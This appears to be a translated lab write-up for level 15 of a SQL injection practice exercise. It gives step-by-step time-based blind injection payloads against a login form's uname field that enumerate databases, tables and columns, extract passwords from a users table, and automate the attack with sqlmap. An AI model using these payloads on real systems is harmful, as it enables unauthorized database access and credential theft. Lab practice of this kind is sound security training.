1. The first step of genius, open bp to turn on interception, open 15 levels, submit the form, bp to view the interception information, and then send to repeater
2. Try single quotation marks, double quotation marks, etc., and found that the page has no error prompts and no display bits. Here, delay injection is used directly. First, we will build a simple payload to determine the closing method, and find that the single quotation mark will succeed.
uname=' and if('1'='1',sleep(5),1)#&passwd=&submit=Submit
Three, determine the number of databases
uname=' and if((select count(schema_name) from information_schema.schemata)=6,sleep(5),1)#&passwd=&submit=Submit
Four, burst database names one by one
uname=' and if(ascii(substr((select schema_name from information_schema.schemata limit 0,1),1,1))=105,sleep(5),1)#&passwd=&submit=Submit
Five, the number of judgment tables
uname=' and if((select count(table_name) from information_schema.tables where table_schema=database())=4,sleep(5),1)#&passwd=&submit=Submit
Six, one by one burst table name
uname=' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>100,sleep(5),1)#&passwd=&submit=Submit
Seven, determine the number of columns
uname=' and if((select count(column_name) from information_schema.columns where table_name='users')=6,sleep(5),1)#&passwd=&submit=Submit
Eight, one by one blast listing
uname=' and if(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))<100,sleep(5),1)#&passwd=&submit=Submit
Nine, determine the amount of data
uname=' and if((select count(password) from users)=17,sleep(5),1)#&passwd=&submit=Submit
Ten, burst data one by one
uname=' and if(ascii(substr((select password from users limit 0,1),1,1))<100,sleep(5),1)#&passwd=&submit=Submit
Use sqlmap to blast and save the intercepted message as a txt file
python sqlmap.py -r "1.txt" -batch -p uname -D security --column
over~